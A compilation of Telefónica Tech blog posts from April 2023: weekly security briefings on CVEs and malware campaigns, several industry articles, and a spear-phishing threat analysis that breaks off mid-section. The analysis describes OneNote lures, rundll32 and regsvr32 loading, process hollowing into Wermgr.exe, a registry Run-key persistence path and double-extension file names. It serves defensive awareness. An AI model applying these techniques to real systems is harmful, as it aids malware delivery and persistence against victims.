Cyber Security Weekly Briefing, 22 – 28 April

Telefónica Tech    28 April, 2023

SolarWinds fixes high severity vulnerabilities

In its latest security update, SolarWinds has fixed a total of 2 high-severity vulnerabilities, which could lead to command execution and privilege escalation.

The more serious of the two vulnerabilities is CVE-2022-36963 (CVSS of 8.8), which is described as a command injection flaw in the SolarWinds infrastructure monitoring and management solution.

The second high-severity vulnerability is CVE-2022-47505 (CVSS of 7.8), which refers to a local privilege escalation flaw.

Both vulnerabilities were reported by researchers from the Trend Micro Zero Day Initiative and were fixed with SolarWinds version 2023.2.

In addition, the new release also resolves the medium severity CVE-2022-47509, which could be exploited remotely to append URL parameters and inject HTML code.

SolarWinds finally fixed two medium severity vulnerabilities in Database Performance Analyzer, leading to the disclosure of sensitive information and allowing users to enumerate in different folders on the server, respectively.

More info

RustBucket: New malware targeting macOS users

Researchers at Jamf Threat Labs have discovered a new malware family targeting macOS users in recent attacks that is capable of obtaining additional payloads from its command and control (C&C) server.

The malware, called RustBucket, has been attributed to the North Korean-associated advanced persistent threat (APT) actor BlueNoroff, which is believed to be a subgroup of the notorious Lazarus Group. RustBucket is executed in three stages.

The first stage uses fraudulent domains and social engineering techniques, as well as an unsigned application called Internal PDF Viewer.app that is designed to obtain and execute the stage two payload on the system.

The second stage consists of a signed application masquerading as a legitimate Apple package identifier; once again the malware begins communicating with the command and control (C&C) server to obtain the stage three payload, which is a signed trojan written in the Rust language that can run on ARM and x86 architectures, collect system information including a list of running processes, identify if it is running in a virtual machine, and also allows the attacker to perform several actions on infected machines.

More info

Critical vulnerabilities in Cisco Industrial Network Director and Modeling Labs

Cisco has released security updates to patch two critical vulnerabilities in its Industrial Network Director and Modeling Labs products.

The first vulnerability is listed as CVE-2023-20036, which has a CVSS of 9.9, and addresses an issue in the Industrial Network Director web interface that would allow an authenticated attacker on the system to modify a request to execute commands with administrative privileges or access sensitive data.

The second vulnerability is CVE-2023-20154, has a CVSS of 9.1 and resides in the Cisco Modeling Labs external authentication mechanism, which could allow an unauthenticated remote attacker to access the web interface with administrative privileges. The latter would affect products configured with LDAP authentication.

More info

Google receives legal authorization to act against CryptBot

Following the authorization issued by a federal judge in the Southern District of New York on the civil action against the operators of the CryptBot malware, Google has begun to disable the infrastructure related to its distribution.

The complaint would target the largest distributors of CryptBot, allegedly geolocated in Pakistan, and its content would be based on allegations of wire fraud and intellectual property infringement.

The company estimates that this malware has infected more than 670,000 computers in the last year, targeting Google Chrome users to exfiltrate their data.

The court has issued a temporary injunction to prevent the spread of this malware, which would allow Google to take action against current and future domains linked to the distribution of CryptBot.

More info

RTM Locker ransomware targets Linux systems

The Uptycs research team has identified a new strain of RTM Locker ransomware targeting Linux operating systems.

It is worth noting that security researchers at Trellix recently published an analysis of the TTPs used by the Read The Manual (RTM) group, a provider of Ransomware as a Service (RaaS).

However, its development has continued to evolve since then to identify this new strain, which infects Linux, NAS and ESXi hosts and is based on the leaked source code of the Babuk ransomware.

It is also characterized by using a combination of ECDH in Curve25519 and Chacha20 to encrypt files, subsequently urging victims to contact support within 48 hours via Tox or threatening to publish data if their demands are not accepted.

According to researchers, the threat actor is known to avoid high-profile targets such as critical infrastructure and hospitals, among others, to avoid attracting attention as much as possible.

More info

You are no longer just a company of products or services, you are a data company

Carlos Lorenzo    26 April, 2023

All companies in operation today are actually data companies. This is because, every day they collect and process a large amount of information: from customers, internal operations, suppliers, partners and competitors…

However, many companies are incapable to see this data as an asset of great value to their business. This is despite the fact that “data is the most valuable gift of digitalization to business management”.

The data a company collects, and potentially should collect, can be used for very specific actions with direct return, such as:

  • Advanced customer segmentation
  • Churn prediction
  • Predictive maintenance of machines
  • Real-time stock management
  • Ppricing optimization…
  • …and much more.

All this is possible with a company’s internal data, but opportunities multiply when we also include other external data sources.

Turning data into valuable assets

Regardless of the sector or area of activity of a company, there are data sources that can offer a really unique value when creating and training algorithmic models to help strategic decision making; this could include meteorological sources, events and work calendars for cities, statistical and demographic data, land registry data and social networks.

If human beings are 70% water, companies are 100% data.

Organizations seeking to remain relevant today are devoting all their efforts to digitally transform themselves, basing their decisions on data with the incorporation of Big Data and Artificial Intelligence technologies.

As if that wasn’t enough, upon solving the challenge of digital transformation that many companies face, they do not find themselves at a competitive advantage, but instead on a level playing field with the rest.

Photo: Stephen Dawson / Unsplash

What really makes a difference is the data you obtain, how you organize it and the strategy for its utilization. So that’s the key, and even more so, is the choice of external data sources that can enrich the information you already have.

In this way, Telco data becomes very important to companies’ corporate strategy. This is due to the large amount of useful information they provide in terms of customer knowledge. 

Big Data and Artificial Intelligence solutions for the tourism industry

Business insights: mobility, tourism or retail spaces

At Telefónica Tech, we understand and classify our Telco data that we can provide to our customers, in an aggregated and anonymized manner. Business insights that allow us to detect behavioral patterns that help us better understand your needs.

In this sense, we offer our clients solutions based on their business requirements;

  • We offer Crowd Analytics services in which we can present behavioral patterns on mobility between different locations and cities; even inside retail locations.
  • We also provide Consent-based data services that facilitates the interaction between brands and their consumers.
  • We also offer analytics for fleet management through our IoT services.
  • In-depth knowledge of communications between branches and  call centers through our Communications solution.

Brands have to gamble on new ways of approaching their consumers, and this is achieved by focusing their efforts on getting to know them better and adapting to their needs and new demands. For this, new technologies play a fundamental role.

Featured photo: Joel Filipe / Unsplash

Smart football stadiums: the world’s greatest show, made even better

Artificial Intelligence applied to industrial Cyber Security (OT)

Jorge Rubio    25 April, 2023

Cyber Security in industrial or OT (Operational Technology) environments is crucial to protect critical infrastructures such as energy, transport and communication and has become an increasing concern as they become more interconnected and dependent on IT (Information Technology).

Different companies and organisations in various industrial environments have suffered from both technical and social engineering attacks over the years, which have become increasingly sophisticated and in greater volume.

Therefore, Artificial Intelligence (AI) could be the key to improving the ability of organisations to detect and prevent cyber-attacks in this type of industry, i.e., to make a qualitative leap in terms of the Cyber Security of OT systems.

How can Artificial Intelligence help improve industrial Cyber Security?

These new AI technologies may be able to detect and respond to security threats more effectively than traditional Cyber Security methods.

The following are some of the applications that Artificial Intelligence can have in the present and future of industrial systems:

  • Monitoring and optimisation of industrial processes to predict maintenance needs and avoid future equipment problems, which would lead to unscheduled production downtime and, in turn, large losses for companies.
  • The automation of security tasks, such as network monitoring, security patching, creating and updating firewall rules, helping security analysts to focus on more complex tasks.
Operator using new technologies in a factory. Shalom de León / Unsplash

Industrial Cyber Security event monitoring tools already have capabilities for learning the behaviour of network communications, and it is foreseeable that these capabilities will be integrated with those provided by Artificial Intelligence.

Staff workloads also mean that they are unable to comprehensively examine all incidents reported over time.

It is therefore difficult to envisage a future in which Artificial Intelligence does not play a key role in responding to industrial cyber-attacks and improving operational efficiency.

Cybersecurity: “black swan“ events in a connected world

The challenges of applying Artificial Intelligence in Cyber Security OT

One of the biggest challenges today is to create safe, sustainable and responsible Artificial Intelligence for all, but it is not the only challenge.

The following are some of the challenges that can be created by the application of AI in industrial Cyber Security solutions:

  1. The quality of the training data needed by Artificial Intelligence (e.g., network traffic files or PCAP) due to the need for privacy and security of each company’s internal information.
  2. The difficulty of interpreting and integrating Artificial Intelligence models into Cyber Security applications.
  3. The possible overload of alerts or lack of threat detection due to the generation of a large number of false positives or negatives due to the misapplication of Artificial Intelligence.
  4. Difficulty in identifying changes in industrial processes without the intervention of the people in charge (operators).
  5. The possibility that algorithms can be fooled or manipulated by attackers.
  6. The high market cost of AI-driven tools.

Concerns about the possible misuse of Artificial Intelligence and machine learning in this field of industrial Cyber Security would also require appropriate regulation.

Jeshoots / Unsplash

On the other hand, it is possible that attempts could be made to use AI to defeat industrial Cyber Security defences by complementing the current knowledge of hackers.

Two researchers won a Zero Day Initiative hackathon by taking control of industrial systems through the use of ChatGPT.

There is a well-known example in a Zero Day Initiative hackathon in which two researchers won by disrupting and taking control of industrial systems through the use of ChatGPT. In this case, the researchers found several weaknesses in their systems and used this Artificial Intelligence to help them write the code to concatenate the vulnerabilities found, which saved them hours of development time.

While it is true that OpenAI and other companies with AI bots are adding controls and filters to prevent such malicious use, there is still some way to go before these technologies are considered completely safe from malicious actors.

Artificial Intelligence, ChatGPT, and Cyber Security

The relevance of AI in industrial Cyber Security

As information and communication technologies continue to evolve and become even more integrated into critical infrastructures, the risk of cyber-attacks will continue to increase and therefore the solutions currently in use in the OT world need to be improved.

The future of Artificial Intelligence applied to industrial Cyber Security could be very promising, as these solutions could significantly improve the ability of organisations to detect patterns of abnormal behaviour and alert operators to potential threats.

The future of Artificial Intelligence applied to industrial Cyber Security is very promising.

In addition, Artificial Intelligence could also be used to predict the risk of an attack and provide recommendations to mitigate the risk before it occurs. AI can also strengthen authentication and authorisation of access to critical systems, as well as identify vulnerabilities in OT systems before they are exploited by attackers.

In conclusion, the use of Artificial Intelligence in industrial Cyber Security may be the key to protecting our critical infrastructures in an increasingly connected world.

Featured photo: DeepMind / Unsplash

Jorge Rubio
Jorge Rubio

Senior Telecommunications Engineer from the University Carlos III of Madrid. Cybersecurity specialist in industrial environments (OT/ICS) at Telefónica Tech. Passionate about new technologies that help us improve people's daily lives.

Cyber Security Weekly Briefing, 15 – 21 April

Telefónica Tech    21 April, 2023

Google fixes two new actively exploited 0-day vulnerabilities

Google has issued new security advisories on the identification of 0-day vulnerabilities affecting the Chrome browser that are being actively exploited.

The security flaw has been reported as CVE-2023-2033. This vulnerability is due to a flaw in the Chrome V8 JavaScript engine that could allow a malicious actor to remotely exploit the vulnerability via a specially crafted HTML page.

On the one hand, the security flaw, CVE-2023-2136, is in the cross-platform 2D graphics library, Skia, and, if exploited, could lead to incorrect graphics rendering, memory corruption or remote code execution that results in unauthorised system access.

More info

LockBit samples found targeting macOS systems

MalwareHunterTeam has found a sample LockBit file that contains the ability to infect multiple operating systems, including, for the first time, Apple’s macOS.

MalwareHunterTeam highlights that this is a remarkable milestone as it is also the first time that one of the major ransomware groups has been known to create malware specifically targeting macOS.

The file found includes an encryptor called ‘locker_Apple_M1_64’, for newer Apple devices, and another for PowerPC CPUs, used by older macOS.

An in-depth analysis of the file shows that, so far, this is an early version of this LockBit strain and could not be used in a real attack, but it shows the interest of this ransomware in attacking macOS devices in the near future.

More info

New QBot campaign identified

Security researchers have published an analysis of the TTPs used in a new campaign of the well-known Qbot malware, which now attacks victims through the use of PDF files and Windows Script Files (WSF).

This phishing campaign is distributed via emails that use legitimate email threads and contain an attached PDF file that, when opened, will download a ZIP file containing a WSF file. This file ultimately aims to execute a PowerShell script, which attempts to download a QBot DLL.

It is worth noting that numerous actors such as BlackBasta, REvil, PwndLocker, Egregor, ProLock and MegaCortex have used Qbot for initial access to corporate networks.

This initial access is done by deploying additional payloads such as Cobalt Strike, Brute Ratel and other malware that allow access to the compromised device..

More info

New PoC enables VM2 sandbox bypassing

Security researchers have released a new PoC capable of bypassing the VM2 sandbox, widely used in the development and security world to run and test untrusted code in an isolated environment.

This bypass would allow malware to run outside the constraints of the sandbox environment. The first vulnerability was identified as CVE-2023-29017 a fortnight ago, and the last two identified as CVE-2023-29199 and CVE-2023-30547.

The latter vulnerability, with a CVSS of 9.8, can be exploited by malicious actors due to a sanitisation flaw that allows the attacker to throw a host exception inside “handleException()”.

Users are advised to fix the vulnerability by upgrading to version 3.9.17 as soon as possible to avoid a potential security incident.

More info

​Critical Vulnerabilities in Alibaba Cloud PostgreSQL Databases

Security researchers at Wiz have published a paper disclosing two critical vulnerabilities in Alibaba Cloud’s PostgreSQL databases.

According to the researchers, these flaws allowed unauthorised access to Alibaba Cloud customers’ PostgreSQL databases, which could lead to a supply chain attack and remote code execution.

It should be noted that the vulnerabilities, which have been named BrokenSesame, were reported to Alibaba Cloud in December 2022, who deployed mitigations on 12 April, although there is no evidence of exploitation.

In conclusion, this is a flaw that would allow privilege escalation in AnalyticDB and another for remote code execution in ApsaraDB RDS.

More info

Featured photo: Clark van der Beken / Unsplash

Industrial digitalization: we share the keys at Advanced Factories

Nacho Palou    20 April, 2023

This week we are at Advanced Factories, the annual reference meeting on innovation and industrial automation, robotics, and digitalized industry or Industry 4.0.

At Telfónica Tech, we are sharing our knowledge and experience. We are also showcasing technologies that enable process automation and digitalization of the industrial sector, driving efficiency and productivity.

“Industry 4.0 consists of integrating technology into the process to produce more and better at lower costs.” —Darío Cesena, Geprom part of Telefónica Tech.

To demonstrate how new generation digital technologies improve industrial competitiveness and how they are applied in the sector, at Advanced Factories we have four demos that incorporate our main enabling technologies of Industry 4.0:

  • IoT sensors to collect real-time data.
  • 5G and NB-IoT connectivity to provide high-speed and ultra-low latency connection.
  • Cloud and Edge Computing to store and process large amounts of data.
  • Industrial management software and data analytics to optimize process management.
  • Big Data and Artificial Intelligence to obtain insights and improve efficiency.
  • Cyber Security to protect the entire industrial process.

Our interactive demos at Advanced Factories

1. Smart Lego Factory, an intelligent process factory


Adapted to an event context, we built a process factory with Lego. Process factories produce goods that cannot be broken down into their elements. This would be the case, for example, with detergent or soda.

  • These types of factories have highly automated processes.
  • Generate lots of data. Capturing and processing data allows process improvement, cost savings, and increased efficiency and profitability.

The Smart Lego Factory demo allows visitors to see and interact with our IoT/MoM Legato platform for manufacturing process management (MES). Legato provides real-time information about factory performance.

  • This solution allows to know any parameter, both in the production process and in the business layer. As long as that process is sensorized, generates data, and is connected.

2. Fab Lab 4.0, a smart factory for discrete manufacturing


Also with a scale model, we showed our visitors how to apply our knowledge and technology to a discrete manufacturing process. This is the type of factory that combines different parts to achieve the final product, such as a car or toy factory.

  • These are usually factories with more involvement of operators, where knowledge resides, than machines, which generates less data.
  • In this case, our MES/SGA Objective platform does not focus as much on data capture as on guiding the operator and monitoring the process. It also monitors the parts used, and the final result.

For this scenario, we have a small toy helicopter factory at the stand that visitors can assemble following the instructions on a screen.

At the same time, MES software tracks the steps and parts used. Upon completing the assembly, the MES software assigns a serial number to each finished toy to ensure traceability of the final product: who assembled it and when, how long it took, what parts were used, etc.

  • Blockchain would add an additional guarantee of authenticity and immutability of that information.
  • In this demo, the Legato software controls the production, monitoring in real time and making decisions to improve the efficiency and quality of the manufacturing process.

3. Connected preventative safety with Livall smart helmets


At our booth, we also have a connected worker helmet. It is based on the same approach as Livall’s connected helmets for motorcyclists or cyclists.

  • For use in industrial environments, the helmet is equipped with sensors that measure air quality and ambient temperature. It also has an accelerometer to detect impacts and sudden movements.
  • Thanks to these sensors, Livall’s helmet can anticipate industrial risks such as environmental toxins or poor air quality.
  • In addition, it can alert in case of detecting impacts or falls of the worker.

The NB-IoT connectivity of the Livall helmet allows its use in large facilities such as a mine or a petrochemical plant.

  • The data generated by the helmet is sent anonymized to a platform that processes it; for example, to activate safety measures.

4. Spot, the 5G-connected ‘robot dog’ for industrial environments monitoring


Spot, the ‘robot dog’ by Boston Dynamics, is the perfect example of the possibilities offered by self-piloted robotics in the industrial sector.

The Alisys unit that accompanies us these days at Advanced Factories incorporates 5G connectivity to communicate with our Edge Computing solution.

  • 5G connectivity, in addition to telecontrol, allows the data captured by the sensors embedded in Spot to be sent: a thermal camera, a 360 vision camera, and control of a robotic arm.

In self-piloted robotics, such as automatic guided vehicles or AGVs, drones, or other machinery, 5G connectivity provides:

  • Ultra-low latency, almost imperceptible, essential for the robot to move and interact with the environment in real time.
  • High capacity to transmit and process data, such as images captured by cameras.

For the industrial sector, we are already defining use cases for self-piloted robots like Spot. Although not directly related to production processes, they have real applications in factories:

  1. In a large-scale car factory to inspect the facilities, Spot can examine for thermal differences or to identify objects.
  2. In a waste processing and recycling center, Spot can identify health risks in the area where the raw material (waste) is stored, such as toxic gases or hazardous materials.

The same technologies that enable Spot (5G connectivity with network slicing, Edge Computing, sensorization) can also be applied to other purposes: logistics, surveillance, or goods movement. Other self-piloted robots, such as drones or AGVs, can also benefit from these technologies.

The knowledge and experience of our experts and clients

In Advanced Factories we also participate with lectures and talks of our experts and customers, to tell first hand their experiences and projects:

Comprehensive digitization of production processes applying Artificial Intelligence: The case of Stolt Sea Farm

Darío Cesena (Geprom part of Telefónica Tech) and Jorge Juan Alfonso (Stolt Sea Farm)

Darío Cesena (Geprom part of Telefónica Tech) and Jorge Juan Alfonso (Stolt Sea Farm) spoke about aquaculture farm digitization. They highlighted how data is changing industrial manufacturing to increase productivity, meet customer demands, and better manage operational processes.

A company’s data is another asset,” says Darío Cesena, Geprom part of Telefónica Tech.

To achieve this, it is necessary to collect and analyze information. Artificial Intelligence models allow for insights and optimizing production, as we do in Stolt Sea Farm’s aquaculture farms.

By applying connectivity solutions, Artificial Intelligence, Big Data, and Cyber Security, which make industrial processes more efficient, Stolt also can predict supply and demand for their products. This is an especially important considering that some species take years to reach their desired size.

Stolt provides “quality service and products to its customers while also promoting innovation in its own activity and in the food sector,” explained Jorge Juan Alfonso, Food Operations Manager at Stolt Sea Farm.

The intelligent helmet for preventive safety management of industry workers

Alfredo Serret (left) from Telefónica Tech and Manu Marín from Livall

Alfredo Serret (Telefónica Tech) and Manu Marín (Livall) talked about connected helmets in the industrial sector. Marín took a few minutes to discuss the beginnings and motivations of Livall, a platform built to “put the benefits of intelligent mobility at the service of people.”

From that idea other variants and applications emerged, such as a helmet for skiers and the connected helmet designed for accident prevention, which we showed at our Advanced Factories stand.

Although the helmet aims to provide “preventive safety to avoid accidents,” it also can sensorize a factory, saving large costs,” explained Marín.

“The digitalization of the industry benefits the people at the center of the process as well.” – Alfredo Serret, Telefónica Tech.

Both participants agreed that Livall’s industrial helmet has many possibilities and use cases for the digitalization of the industry to also benefit “the people who are at the center of industrial processes,” explained Alfredo Serret.

Quality and maintenance: A leap in competitiveness supported by technology

Javier Martínez Borreguero (Telefónica Tech)


Javier Martínez Borreguero (Telefónica Tech) participated in a roundtable discussion on predictive maintenance with Artificial Intelligence. Borreguero listed some benefits of industry digitalization:

  • Resilience.
  • Sustainability and positive impact.
  • New business models.

“In the next five years, 95% of quality and maintenance management processes in the industry will incorporate Artificial Intelligence and massive connectivity,” he added.

These are available technologies that we can incorporate into the industrial sector to tackle challenges in quality and maintenance management.

“5G connectivity and Artificial Intelligence are realities. They are available technologies. The question is: are they integrated into your production processes?” – Javier Martínez Borreguero, Telefónica Tech.

Satellites with 5G technology to provide IoT coverage worldwide

Turn-key solutions for Industry 4.0

At Advanced Factories we share our complete vision of a digitized factory, end-to-end: from the entry of raw materials to the exit of the final product.

5G connectivity, Cloud, Cyber Security, Big Data or Artificial Intelligence models, among other enabling technologies, allow us to address any need across the entire spectrum, from the factory floor to data analysis.

Further, we develop digitalization projects that connect factory software with business layers using our industrial knowledge and sensorization. As a result, we can provide customized solutions to meet the needs of each customer.

Nacho Palou
Nacho Palou

Marketing & Comms en Telefónica Tech. Apasionado de las tecnologías disruptivas y también de las obsoletas. Cuando no escribo hago fotos.

Metaverse (II): the challenge of building a virtual space that is secure, inclusive and beneficial to everyone

Estevenson Solano    19 April, 2023

As we learned in the previous article of this series, impact of the metaverse on disinformation, child security, its evolution and its potential to spread discrimination and inequalities will depend on how the technology is developed, regulated and used by individuals and organisations.

Many uncertainties remain: Will the metaverse produce misinformation, will children be safe from inappropriate content, will games and pornography drive its evolution, and will it increase discrimination and inequalities?

We don’t know, but it is important to address some issues proactively to ensure that the metaverse is a safe, inclusive and beneficial space for all:

  • Disinformation can create new opportunities for the spread of information and fake news, especially in virtual social environments where people can interact and share information. However, it is also possible that the metaverse offers new tools and techniques for verifying information, checking facts, and combating disinformation.
  • Child security presents new risks and challenges, especially in terms of inappropriate content, cyber-bullying, and online grooming. However, the metaverse is also likely to offer new tools and techniques to ensure children’s security, such as virtual security filters, parental controls, and moderation tools.
  • As for the evolution of the metaverse, it is likely that gaming and pornography will continue to drive its development, given the popularity of these industries and their current presence in virtual environments. However, other industries and applications, such as education, healthcare and business, are also likely to emerge and could shape the metaverse in different ways.
  • Discrimination and inequality may further exacerbate existing problems, especially if technology is not designed with diversity, equity and inclusion in mind. Nevertheless, it is also possible that the metaverse offers new opportunities for people to connect, collaborate and learn from each other, regardless of their background or identity.
The metaverse will be a means, not an end, for companies

Most significant potential impacts of the metaverse

The impact of technological and cyber risks in the metaverse can be significant and far-reaching. Here are some of the potential impacts:

  • Loss of privacy and data security: If personal data is compromised, it could lead to identity theft, financial fraud, and other malicious activities. This could have serious consequences for both individuals and businesses.
  • Financial losses: Cyber-attacks that result in the theft of assets or virtual currencies could lead to significant financial losses for individuals and businesses operating in the metaverse.
  • Reputational damage: If a company’s or individual’s virtual presence is hacked or compromised, it could lead to reputational damage and loss of trust among its followers and customers.
  • Health problems: Addiction to the metaverse and overuse of virtual reality technology could lead to physical and mental health problems, such as eyestrain, headaches, and social isolation.
  • Limiting innovation and creativity: If the metaverse becomes centralised and controlled by a few powerful entities, it could limit innovation and creativity, stifling the potential of the virtual world.

The impacts of technological and cyber risks in the metaverse could be significant and require proactive measures to address and prevent these risks. As the metaverse becomes more pervasive, it will be essential to implement robust security protocols and regulations to ensure a safe and positive experience for all users.

Main challenges for the adoption of the metaverse

Mitigating risks and minimising their impact

As experts highlight, these risks can affect not only individuals, but also businesses, governments, and society as a whole.

Among the potential impacts of technological and cyber risks in the metaverse are, in addition to those already mentioned, also identity theft, cyberbullying and exposure to harmful content.

These risks can also lead to a lack of trust in the metaverse and hinder its adoption and growth.

Photo: Billetto Editorial / Unsplash

The interconnected nature of the metaverse can also amplify the impact of cyber-attacks, potentially affecting multiple users and platforms simultaneously. Also, the complexity of the technological infrastructure of the metaverse and the rapid pace of innovation and development may pose significant new challenges for Cyber Security.

Conclusion

Hence, to mitigate these risks and minimise their potential impact, organisations and individuals must take proactive steps to ensure the security and privacy of their data and interactions in the metaverse. This includes implementing robust cyber security measures, promoting digital literacy and awareness, and adopting ethical and responsible practices.

The impact of technological and cyber risks in the metaverse therefore highlights the importance of prioritising Cyber Security and privacy in the development and use of virtual environments.

Metaverse (I): threats in an immersive, multi-sensory environment

Featured photo: Stem. T4L / Unsplash.

Estevenson Solano
Estevenson Solano

Skeptical, curious and detail oriented; helping to develop, orchestrate, articulate, and promote actions comprising cyber exposure surface assurance with a focus on Governance, Risk and Compliance (GRC) with a mission to strengthen cyber maturity and cyber resilience postures. I am your ally in cyberspace, activating human firewalls! "Never trust, always verify".

Evolution of Spear-Phishing Techniques of Notorious Threat Groups and malware used

Aarón Jornet    17 April, 2023

In recent years, different campaigns and threats have been metabolised and their entry vector has been the same, the e-mail. This initial access always seems to be the most absurd, to which no attention should be paid, because the company has made employees aware of it.

The trend tells us that this is quite the opposite, as many of the criminal groups and APTs continue to use this technique, varying the modality or evolving it, leaving the most vulnerable element, human error, in question.

Phishing, a social engineering technique used as initial access since the mid-1990s, is nothing more than another tool to deceive the victim in order to obtain confidential information, dressing the mail with fraudulent messages that seem close to the victim and difficult (in most cases) to distinguish at first glance from the mail the attackers are trying to emulate.

Hand in hand with this technique, we come to Spear-Phishing, which has different sub-techniques (T1566.001, T1566.002, T1566.003), which, taking advantage of the fraudulent email, tries to get the victim to access a link, an attached document, etc.

How have attackers used these techniques over the years?

The evolution of techniques such as Spear-Phishing has been marked by the use made of them by the groups that have used them.

A representative diagram of how they have improved the method of action, bearing in mind that the techniques are not linear and that over the years they have all been used, would be as follows:

It is worth noting again the great variability and sustainability over the years of such techniques, which gain initial access to an infrastructure to be deployed later.

It’s not so bad, is it?

This question is more than often asked in pre-incident situations. Are there “less” dangerous groups using Spear-Phishing as an initial weapon, yes, are there criminal groups and APTs using it? Yes.

We find a large number of incidents that start with this seemingly simple system, but which contains different phases used by orchestrated groups:

During these phases, depending on the actor, it may try to discover more computers on the network, move laterally and replicate the execution of the malware in question on different devices, in order to obtain as much information as possible from the infrastructure to later sell the data obtained or simply take advantage of it for strategic purposes.

Or, on the other hand, it may belong to other groups, therefore to a different attack structure where its objective is to obtain as much information as possible from the infrastructure in order to pivot to a domain controller and be able to launch a ransomware for which a ransom will be demanded for the affected files, under threat of publishing all the data obtained, and even extorting the providers or companies that intermediate with the victim.

What are the new techniques and who uses them?

Currently, as we mentioned in the previous point, Spear-Phishing continues to evolve, as well as continuing to use the same techniques as always. In recent weeks, we have seen a large number of campaigns using OneNote for this purpose.

The different malwares that have been seen using this methodology are as follows:

  • Emotet | Heodo
  • Qbot | QakBot
  • AsyncRAT
  • Remcos
  • IcedID

These malwares are often used by different criminal groups, as well as APTs that keep on completely attacking certain companies depending on their particular interests.

A summary of the use of each with their functionalities would be as follows:

How do these new techniques work?

Firstly, the group would try to access the weakest link through the mail, as mentioned above, where they would try to get us to download the attachments, which in this case would be OneNote.

Searching for Spear-Phishing files using OneNote:

As mentioned, depending on the campaigns, OneNote or documents such as Excel or Word with macros, links, etc. can be used. The campaigns, depending on the attacking group and the victim, will be more or less targeted and sophisticated.

In this search we can also find this type of Spear-Phishing.

Often, the origin from which these emails are sent is decentralised, as they can come from the mail servers of compromised organisations or even from Botnets themselves.

Attackers usually use different proxies to avoid revealing their location, however, we can sometimes find the origin from where these actors operate.

The email, as usual, will try to get you to download or access the link with an urgent or management issue.

After this, depending on the version, we will get a OneNote which will try to get us to execute a fake banner in order to access the content. The result will be the execution of the malware.

This time, under the panel, which will be an image, we will have an execution via VBS, but depending on the OneNote, it could be another type of script (JS, HTA…), a link that downloads the next phase, etc. By dragging it is easy to get the script that is going to be executed from behind.

This time, under the panel, which will be an image, we will have an execution via VBS, but depending on the OneNote, it could be another type of script (JS, HTA…), a link that downloads the next phase, etc. By dragging it is easy to get the script that is going to be executed from behind:

We found images used, as we had mentioned, to make the victim access the button, which is really a simple PNG, which, underneath, has a real button, in this case:

The most interesting case would be in this case the job object, which is not static, it can be a different one, as it usually contains the script that will perform a download and then launch an execution or directly, it will be a more obfuscated script that will contain the binary that will be executed later.

After the extraction, we find different scripts, with very different sizes

This is due to the level of obfuscation they may have, if they contain a binary to be executed later, etc.
The simplest example would be a script that tries to download to a malicious domain and then execute it, in this case it is a library which will be launched via rundll32.exe

In execution it is most common to find a OneNote running a Wscript launching a Rundll32 or Regsvr32.

But, with so many groups and campaigns abusing OneNote, the interesting process trees we have seen after analysis of different campaigns are the following:

It is interesting to note that in some malware families, such as AsyncRat, the extension is sometimes duplicated, as it is common in the business environment that employees in most departments are not assigned to see the file extensions, so we can find some like these:

  • <file>.bat.exe
  • <file>.pdf.exe
  • <file>.vbs.exe

After this point, the malware will have already been downloaded or executed in some of the ways we have discussed above, but we have only dealt with the Spear-Phishing technique, and how it works in a real environment, which coincides in most cases, alternating some of the phases depending on which group is exploiting it.

However, what techniques and objectives does the actor behind the campaign pursue with the malware he will use later on? This question will vary depending on who is behind the campaign, the sector the victim belongs to, the malware they will use for this purpose, etc.

As mentioned above, there are a large number of malware that have been involved in the steps following this Spear-Phishing trend, so we will try to summarise the role of each of these families in order to understand the impact they will have on an infrastructure.

Qbot | QakBot

Qbot is a Malware that has evolved through various categorisations such as Banker, Stealer, Backdoor, etc. Its basic function is to obtain sensitive information from the victim and then exfiltrate it.

There are different actors that have used Qbot, such as the criminal group EvilCorp, better known for the use of Dridex or GoldCabin, another criminal group that is linked to different recognised malwares such as BokBot (IcedID), which also fits in with the phishing trends we have seen.

The operation of the new versions of Qbot can be summarised as follows:

  • After the Spear-Phishing discussed in the previous sections, a download or direct execution of a library will be obtained, which will be executed via Regsvr32 or Rundll32
  • Once executed, Qbot usually performs an injection into a legitimate process, in this campaign Wermgr.exe is being widely used, where under this process it will be able to act with a greater number of stealth, as it is a common process in an infrastructure.
  • The injection is usually being observed by ProcessHollowing, where we can see how Wermgr.exe will be created in a suspended state and where the desired code will be introduced reserving space in this process.
  • After this, it persists in registry keys known as CurrentVersion\Run or in tasks, where it also excels in creating other logs that store relevant information from the hardcoded campaign. Here we will usually have data on where the malicious library launched in the previous stage is located:
  • It can then make connections to the outside where it can send sensitive victim information to the C&C.

Emotet | Heodo

Emotet is a Malware that has also evolved over time and its uses have also been diverse. It has been used mainly as a Banker, as a downloader and as a Botnet.

In the last few years it has been gaining different anti-analysis technique capabilities and has characteristics to obtain information and launch itself through other computers within its reach to increase its Botnet. It is commonly used by the MummySpider group or TA542, a criminal group that acts through campaigns, usually using phishing.

Over the years, they have been perfecting and updating this famous malware, as well as being involved with other known malware groups such as BokBot (IcedID), Trickbot, Dridex, or the aforementioned Qbot.

The operation of the new versions of Qbot can be summarised as follows:

  • After the Spear-Phishing discussed in the previous sections, a download or direct execution of a library will be obtained, which will be executed via Regsvr32 or Rundll32.
  • This Dll will have capabilities to evade analysis or be, sometimes difficult or impossible to analyse by sandbox, due to its anti-analysis techniques or by debuggers:
  • Make a habit of creating persistence by launching the same dll renamed \Local\ in the folder and adding it to the registry key:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  • After these phases Emotet can establish communication with the C&C and receive instructions or operate from this position where it already has persistence and has the malware in other locations, or it can also try to move files or execute itself in other devices or disks within its reach:

Emotet will try to obtain as much information as possible from the system or network in which it is located in order to further increase its Botnet

AsyncRAT and Remcos

On the other hand, AsyncRAT and Remcos are two types of malware that have also evolved over time and have different uses.

Both are known to be remote access Trojans (RATs) that allow the attacker to gain control over an infected system and perform different malicious actions, such as stealing information, installing more malware or remotely controlling the system.

The initial forms of access are similar to each other, as they often abuse phishing and are among the new OneNote abuse trends.

The groups that have used AsyncRat are very diverse, usually aiming at information theft and espionage, and originating from different locations. Groups such as Vendetta (Turkey), Earth Berberoka (China) or APT-C-36 (Colombia) have used this type of RATs to a greater or lesser extent in their history.

The groups that have used Remcos are also different, with similar purposes to those of AsyncRat, whose groups sometimes coincide in their use, as is the case of APT-C-36 or Vendetta and is also used by other groups such as GorgonGroup (Pakistan) or APT33 (Iran).

The functioning of the new versions of these two RATs can be summarised as follows:

  • After the Spear-Phishing discussed in the previous sections, an execution would be obtained, usually by creating a download or executing a script or command.
